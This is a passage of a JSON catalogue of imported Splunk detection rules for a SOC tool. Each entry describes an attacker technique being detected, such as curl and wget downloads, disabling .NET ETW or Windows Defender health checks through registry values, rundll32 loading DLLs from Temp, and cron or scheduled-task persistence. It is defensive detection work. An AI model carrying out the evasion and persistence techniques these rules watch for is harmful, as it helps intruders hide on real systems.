"category": "_migrated", "mitre_techniques": [ "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-hidden-files-and-directories.yaml", "provenance": { "source": "splunk/security_content", "source_id": "51c43b7b-e406-45d2-9bad-5c67f07e6528", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_hidden_files_and_directories.yml" } }, { "id": "splunk-security-content-51fbcaf2-6259-11ec-b0f3-acde48001122", "type": "detection", "name": "Linux Add User Account", "description": "The following analytic detects the creation of new user accounts on Linux systems using commands like \"useradd\" or \"adduser.\" It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as adversaries often create new user accounts to establish persistence on compromised hosts. 
If confirmed malicious, this could allow attackers to maintain access, escalate privileges, and further compromise the system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-add-user-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "51fbcaf2-6259-11ec-b0f3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_add_user_account.yml" } }, { "id": "splunk-security-content-520da6fa-7d5d-4a3b-9c61-1087517b8d0f", "type": "detection", "name": "Windows Rundll32 Load DLL in Temp Dir", "description": "This detection identifies instances where rundll32.exe is used to load a DLL from a temporary directory, such as C:\\Users\\\\AppData\\Local\\Temp\\ or C:\\Windows\\Temp\\. While rundll32.exe is a legitimate Windows utility used to execute functions exported from DLLs, its use to load libraries from temporary locations is highly suspicious. These directories are commonly used by malware and red team tools to stage payloads or execute code in-memory without writing it to more persistent locations. This behavior often indicates defense evasion, initial access, or privilege escalation, especially when the DLL is unsigned, recently written, or executed shortly after download. In normal user workflows, DLLs are not typically loaded from Temp paths, making this a high-fidelity indicator of potentially malicious activity. 
Monitoring this pattern is essential for detecting threats that attempt to blend in with native system processes while bypassing traditional application controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rundll32-load-dll-in-temp-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "520da6fa-7d5d-4a3b-9c61-1087517b8d0f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rundll32_load_dll_in_temp_dir.yml" } }, { "id": "splunk-security-content-5211c260-820e-4366-b983-84bbfb5c263a", "type": "detection", "name": "Windows Impair Defense Change Win Defender Health Check Intervals", "description": "The following analytic detects modifications to the Windows registry that change the health check interval of Windows Defender. It leverages data from the Endpoint datamodel, specifically monitoring changes to the \"ServiceKeepAlive\" registry path with a value of \"0x00000001\". This activity is significant because altering Windows Defender settings can impair its ability to perform timely health checks, potentially leaving the system vulnerable. 
If confirmed malicious, this could allow an attacker to disable or delay security scans, increasing the risk of undetected malware or other malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-change-win-defender-health-check-intervals.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5211c260-820e-4366-b983-84bbfb5c263a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_change_win_defender_health_check_intervals.yml" } }, { "id": "splunk-security-content-523c2684-a101-11eb-916b-acde48001122", "type": "detection", "name": "Schedule Task with HTTP Command Arguments", "description": "The following analytic detects the creation of scheduled tasks on Windows systems that include HTTP command arguments, using Windows Security EventCode 4698. It identifies tasks registered via schtasks.exe or TaskService with HTTP in their command arguments. This behavior is significant as it often indicates malware activity or the use of Living off the Land binaries (lolbins) to download additional payloads. 
If confirmed malicious, this activity could lead to data exfiltration, malware propagation, or unauthorized access to sensitive information, necessitating immediate investigation and mitigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/schedule-task-with-http-command-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "523c2684-a101-11eb-916b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/schedule_task_with_http_command_arguments.yml" } }, { "id": "splunk-security-content-52b48e8b-eb6e-48b0-b8f1-73273f6b134e", "type": "detection", "name": "Windows WPDBusEnum Registry Key Modification", "description": "This analytic is used to identify when a USB removable media device is attached to a Windows host. In this scenario we are querying the Endpoint Registry data model to look for modifications to the Windows Portable Device keys HKLM\\SOFTWARE\\Microsoft\\Windows Portable Devices\\Devices\\ or HKLM\\System\\CurrentControlSet\\Enum\\SWD\\WPDBUSENUM\\ . 
Adversaries and Insider Threats may use removable media devices for several malicious activities, including initial access, execution, and exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200", "T1025", "T1091" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wpdbusenum-registry-key-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "52b48e8b-eb6e-48b0-b8f1-73273f6b134e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wpdbusenum_registry_key_modification.yml" } }, { "id": "splunk-security-content-52f6d751-1fd4-4c74-a4c9-777ecfeb5c58", "type": "detection", "name": "Linux Adding Crontab Using List Parameter", "description": "The following analytic detects suspicious modifications to cron jobs on Linux systems using the crontab command with list parameters. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it may indicate an attempt to establish persistence or execute malicious code on a schedule. If confirmed malicious, the impact could include unauthorized code execution, data destruction, or other damaging outcomes. 
Further investigation should analyze the added cron job, its associated command, and any related processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-adding-crontab-using-list-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "52f6d751-1fd4-4c74-a4c9-777ecfeb5c58", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_adding_crontab_using_list_parameter.yml" } }, { "id": "splunk-security-content-52fd468b-cb6d-48f5-b16a-92f1c9bb10cf", "type": "detection", "name": "Linux Ingress Tool Transfer Hunting", "description": "The following analytic detects the use of 'curl' and 'wget' commands within a Linux environment. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, user information, and command-line executions. This activity is significant as 'curl' and 'wget' are commonly used for downloading files, which can indicate potential ingress of malicious tools. If confirmed malicious, this activity could lead to unauthorized code execution, data exfiltration, or further compromise of the system. 
Monitoring and tuning this detection helps identify and differentiate between normal and potentially harmful usage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-ingress-tool-transfer-hunting.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "52fd468b-cb6d-48f5-b16a-92f1c9bb10cf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_ingress_tool_transfer_hunting.yml" } }, { "id": "splunk-security-content-535cb214-8b47-11ec-a2c7-acde48001122", "type": "detection", "name": "Linux System Network Discovery", "description": "The following analytic identifies potential enumeration of local network configuration on Linux systems.\nIt detects this activity by monitoring processes such as \"arp,\" \"ifconfig,\" \"ip,\" \"netstat,\" \"firewall-cmd,\" \"ufw,\" \"iptables,\" \"ss,\" and \"route\" within a 30-minute window.\nThis behavior is significant as it often indicates reconnaissance efforts by adversaries to gather network information for subsequent attacks.\nIf confirmed malicious, this activity could enable attackers to map the network, identify vulnerabilities, and plan further exploitation or lateral movement within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": 
"imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-system-network-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "535cb214-8b47-11ec-a2c7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_system_network_discovery.yml" } }, { "id": "splunk-security-content-535fd4fc-7151-4062-9d7e-e896bea77bf6", "type": "detection", "name": "Windows Query Registry UnInstall Program List", "description": "The following analytic detects an access request on the uninstall registry key. It leverages Windows Security Event logs, specifically event code 4663. This activity is significant because adversaries or malware can exploit this key to gather information about installed applications, aiding in further attacks. 
If confirmed malicious, this behavior could allow attackers to map out installed software, potentially identifying vulnerabilities or software to exploit, leading to further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-query-registry-uninstall-program-list.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "535fd4fc-7151-4062-9d7e-e896bea77bf6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_query_registry_uninstall_program_list.yml" } }, { "id": "splunk-security-content-538d0152-7aaa-11eb-beaa-acde48001122", "type": "detection", "name": "Ryuk Wake on LAN Command", "description": "The following analytic detects the use of Wake-on-LAN commands associated with Ryuk ransomware. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific process and command-line activities. This behavior is significant as Ryuk ransomware uses Wake-on-LAN to power on devices in a compromised network, increasing its encryption success rate. If confirmed malicious, this activity could lead to widespread ransomware encryption across multiple endpoints, causing significant operational disruption and data loss. 
Immediate isolation and thorough investigation of the affected endpoints are crucial to mitigate the impact.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ryuk-wake-on-lan-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "538d0152-7aaa-11eb-beaa-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ryuk_wake_on_lan_command.yml" } }, { "id": "splunk-security-content-53b4c927-5ec4-47cd-8aed-d4b303304f87", "type": "detection", "name": "Windows ESX Admins Group Creation Security Event", "description": "This analytic detects creation, deletion, or modification of the \"ESX Admins\" group in Active Directory. 
These events may indicate attempts to exploit the VMware ESXi Active Directory Integration Authentication Bypass vulnerability (CVE-2024-37085).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001", "T1136.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-esx-admins-group-creation-security-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "53b4c927-5ec4-47cd-8aed-d4b303304f87", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_esx_admins_group_creation_security_event.yml" } }, { "id": "splunk-security-content-5434f670-155d-11ec-8cca-acde48001122", "type": "detection", "name": "Get WMIObject Group Discovery", "description": "The following analytic detects the use of the `Get-WMIObject Win32_Group` command executed via PowerShell to enumerate local groups on an endpoint. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. Identifying local groups can be a precursor to privilege escalation or lateral movement. 
If confirmed malicious, this activity could allow an attacker to map out group memberships, aiding in further exploitation or unauthorized access to sensitive resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-wmiobject-group-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5434f670-155d-11ec-8cca-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_wmiobject_group_discovery.yml" } }, { "id": "splunk-security-content-5456bdef-d765-4565-8e1f-61ca027bc50d", "type": "detection", "name": "Zscaler Privacy Risk Destinations Threat Blocked", "description": "The following analytic identifies blocked destinations within a network that are deemed privacy risks by Zscaler. It leverages web proxy logs, focusing on entries marked as \"Privacy Risk.\" Key data points such as device owner, user, URL category, destination URL, and IP are analyzed. This activity is significant for a SOC as it helps monitor and manage privacy risks, ensuring a secure network environment. 
If confirmed malicious, this activity could indicate attempts to access or exfiltrate sensitive information, posing a significant threat to data privacy and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-privacy-risk-destinations-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5456bdef-d765-4565-8e1f-61ca027bc50d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_privacy_risk_destinations_threat_blocked.yml" } }, { "id": "splunk-security-content-5456bdef-d765-4565-8e1f-61ca027bc50e", "type": "detection", "name": "Zscaler Employment Search Web Activity", "description": "The following analytic identifies web activity related to employment searches within a network. It leverages Zscaler web proxy logs, focusing on entries categorized as 'Job/Employment Search'. Key data points such as device owner, user, URL category, destination URL, and IP are analyzed. This detection is significant for SOCs as it helps monitor potential insider threats by identifying users who may be seeking new employment. 
If confirmed malicious, this activity could indicate a risk of data exfiltration or other insider threats, potentially leading to sensitive information leakage or other security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-employment-search-web-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5456bdef-d765-4565-8e1f-61ca027bc50e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_employment_search_web_activity.yml" } }, { "id": "splunk-security-content-54a6ed00-3256-11ec-b031-acde48001122", "type": "detection", "name": "CMD Carry Out String Command Parameter", "description": "The following analytic detects the use of `cmd.exe /c` to execute commands, a technique often employed by adversaries and malware to run batch commands or invoke other shells like PowerShell. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process metadata. Monitoring this activity is crucial as it can indicate script-based attacks or unauthorized command execution. 
If confirmed malicious, this behavior could lead to unauthorized code execution, privilege escalation, or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cmd-carry-out-string-command-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "54a6ed00-3256-11ec-b031-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cmd_carry_out_string_command_parameter.yml" } }, { "id": "splunk-security-content-54c95f4d-3e5d-44be-9521-ea19ba62f7a8", "type": "detection", "name": "Linux c89 Privilege Escalation", "description": "The following analytic detects the execution of the 'c89' command with elevated privileges, which can be used to compile and execute C programs as root. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events that include command-line arguments. This activity is significant because it indicates a potential privilege escalation attempt, allowing a user to execute arbitrary commands as root. 
If confirmed malicious, this could lead to full system compromise, enabling the attacker to gain root access and execute any command with elevated privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-c89-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "54c95f4d-3e5d-44be-9521-ea19ba62f7a8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_c89_privilege_escalation.yml" } }, { "id": "splunk-security-content-54dc1265-2f74-4b6d-b30d-49eb506a31b3", "type": "detection", "name": "Protocol or Port Mismatch", "description": "The following analytic identifies network traffic where the higher layer protocol does not match the expected port, such as non-HTTP traffic on TCP port 80. It leverages data from network traffic inspection technologies like Bro or Palo Alto Networks firewalls. This activity is significant because it may indicate attempts to bypass firewall restrictions or conceal malicious communications. 
If confirmed malicious, this behavior could allow attackers to evade detection, maintain persistence, or exfiltrate data through commonly allowed ports, posing a significant threat to network security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/protocol-or-port-mismatch.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "54dc1265-2f74-4b6d-b30d-49eb506a31b3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/protocol_or_port_mismatch.yml" } }, { "id": "splunk-security-content-54fa06c5-96a2-4406-a4a7-44d93ddbd173", "type": "detection", "name": "Cisco NVM - Suspicious Network Connection From Process With No Args", "description": "This analytic detects system binaries that are commonly abused in process injection techniques but are observed without any command-line arguments.\nIt leverages Cisco Network Visibility Module (NVM) flow data and process arguments\nto identify outbound connections initiated by curl where TLS checks were explicitly disabled.\nBinaries such as `rundll32.exe`, `regsvr32.exe`, `dllhost.exe`, `svchost.exe`, and others are legitimate Windows processes that are often injected into by malware or post-exploitation frameworks (e.g., Cobalt Strike) to hide execution.\nWhen these processes are seen initiating a network connection with an empty or missing command line, it can indicate\npotential injection and communication with a command and control server.", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-suspicious-network-connection-from-process-with-no-args.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "54fa06c5-96a2-4406-a4a7-44d93ddbd173", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___suspicious_network_connection_from_process_with_no_args.yml" } }, { "id": "splunk-security-content-5521f8c5-1aa3-473c-9eb7-853701924a06", "type": "detection", "name": "Azure AD Privileged Graph API Permission Assigned", "description": "The following analytic detects the assignment of high-risk Graph API permissions in Azure AD, specifically Application.ReadWrite.All, AppRoleAssignment.ReadWrite.All, and RoleManagement.ReadWrite.Directory. It uses azure_monitor_aad data to scan AuditLogs for 'Update application' operations, identifying when these permissions are assigned. This activity is significant as it grants broad control over Azure AD, including application and directory settings. If confirmed malicious, it could lead to unauthorized modifications and potential security breaches, compromising the integrity and security of the Azure AD environment. 
Immediate investigation is required.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-privileged-graph-api-permission-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5521f8c5-1aa3-473c-9eb7-853701924a06", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_privileged_graph_api_permission_assigned.yml" } }, { "id": "splunk-security-content-55349868-5583-466f-98ab-d3beb321961e", "type": "detection", "name": "AWS Console Login Failed During MFA Challenge", "description": "The following analytic identifies failed authentication attempts to the AWS Console during the Multi-Factor Authentication (MFA) challenge. It leverages AWS CloudTrail logs, specifically the `additionalEventData` field, to detect when MFA was used but the login attempt still failed. This activity is significant as it may indicate an adversary attempting to access an account with compromised credentials but being thwarted by MFA. 
If confirmed malicious, this could suggest an ongoing attempt to breach the account, potentially leading to unauthorized access and further attacks if MFA is bypassed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-console-login-failed-during-mfa-challenge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "55349868-5583-466f-98ab-d3beb321961e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_console_login_failed_during_mfa_challenge.yml" } }, { "id": "splunk-security-content-553d0429-1a1c-44bf-b3f5-a8513deb9ee5", "type": "detection", "name": "Hunting 3CXDesktopApp Software", "description": "The following analytic detects the presence of any version of the 3CXDesktopApp, also known as the 3CX Desktop App, on Mac or Windows systems. It leverages the Endpoint data model's Processes node to identify instances of the application running, although it does not provide file version information. This activity is significant because 3CX has identified vulnerabilities in versions 18.12.407 and 18.12.416, which could be exploited by attackers. 
If confirmed malicious, this could lead to unauthorized access, data exfiltration, or further compromise of the affected systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1195.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/hunting-3cxdesktopapp-software.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "553d0429-1a1c-44bf-b3f5-a8513deb9ee5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/hunting_3cxdesktopapp_software.yml" } }, { "id": "splunk-security-content-55502381-5cce-491b-9277-7cb1d10bc0df", "type": "detection", "name": "Windows Registry Dotnet ETW Disabled Via ENV Variable", "description": "The following analytic detects a registry modification that disables the ETW for the .NET Framework. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the COMPlus_ETWEnabled registry value under the \"Environment\" registry key path for both user (HKCU\\Environment) and machine (HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment) scopes. This activity is significant because disabling ETW can allow attackers to evade Endpoint Detection and Response (EDR) tools and hide their execution from audit logs. 
If confirmed malicious, this action could enable attackers to operate undetected, potentially leading to further compromise and persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-dotnet-etw-disabled-via-env-variable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "55502381-5cce-491b-9277-7cb1d10bc0df", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_dotnet_etw_disabled_via_env_variable.yml" } }, { "id": "splunk-security-content-555cc358-bf16-4e05-9b3a-0f89c73b7261", "type": "detection", "name": "Linux Auditd Hidden Files And Directories Creation", "description": "The following analytic detects suspicious creation of hidden files and directories, which may indicate an attacker's attempt to conceal malicious activities or unauthorized data. Hidden files and directories are often used to evade detection by security tools and administrators, providing a stealthy means for storing malware, logs, or sensitive information. 
By monitoring for unusual or unauthorized creation of hidden files and directories, this analytic helps identify potential attempts to hide malicious operations, enabling security teams to uncover and address hidden threats effectively.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-hidden-files-and-directories-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "555cc358-bf16-4e05-9b3a-0f89c73b7261", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_hidden_files_and_directories_creation.yml" } }, { "id": "splunk-security-content-55d8741c-fa32-4692-8109-410304961eb8", "type": "detection", "name": "Windows Office Product Spawned Uncommon Process", "description": "The following analytic detects a Microsoft Office product spawning uncommon processes. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where Office applications are the parent process. This activity is significant as it may indicate an attempt of a malicious macro execution or exploitation of an unknown vulnerability in an office product, in order to bypass security controls. 
